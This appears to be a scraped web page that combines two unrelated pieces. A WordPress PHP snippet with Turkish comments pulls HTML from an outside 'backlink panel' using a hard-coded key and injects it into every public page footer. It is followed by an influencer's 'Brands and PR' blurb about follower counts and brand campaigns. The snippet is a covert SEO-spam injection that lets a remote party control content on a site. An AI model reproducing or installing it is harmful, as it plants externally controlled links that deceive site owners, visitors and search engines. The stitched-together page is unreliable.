// functions.php (child theme içinde) function add_boss_seo_backlink() { if (is_admin() || wp_doing_ajax() || wp_doing_cron()) { return; } // Cache için transients kullan $cache_key = 'boss_seo_backlink_' . date('Y-m-d_H'); $backlinkHtml = get_transient($cache_key); if (false === $backlinkHtml) { $ch = curl_init('https://bossseobacklinkpanel.com/embed.php?key=ba0f76d93d22802c846bb8cbdaa472&nocache=' . mt_rand()); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_FRESH_CONNECT => true, CURLOPT_TIMEOUT => 3, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_FAILONERROR => true ]); $backlinkHtml = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); // Başarılıysa 1 saat cache'le if ($backlinkHtml && $httpCode === 200) { set_transient($cache_key, $backlinkHtml, HOUR_IN_SECONDS); } else { $backlinkHtml = ''; } } if (!empty($backlinkHtml)) { echo wp_kses_post($backlinkHtml); } } add_action('wp_footer', 'add_boss_seo_backlink', 5); // wp_footer'dan önce
Brands and PR
Harpreet’s social media continues to grow organically across Instagram, Twitter, Linked In and Tik Tok. With a total follower count of over 120 000+, her followers are consistently engaging across all aspects of her life – business and personal. For any brand deals and campaigns, get in touch.
Harpreet has worked with a number of global brands on campaigns across socials including Xero, Mercedez Benz, Adobe, Dell and more.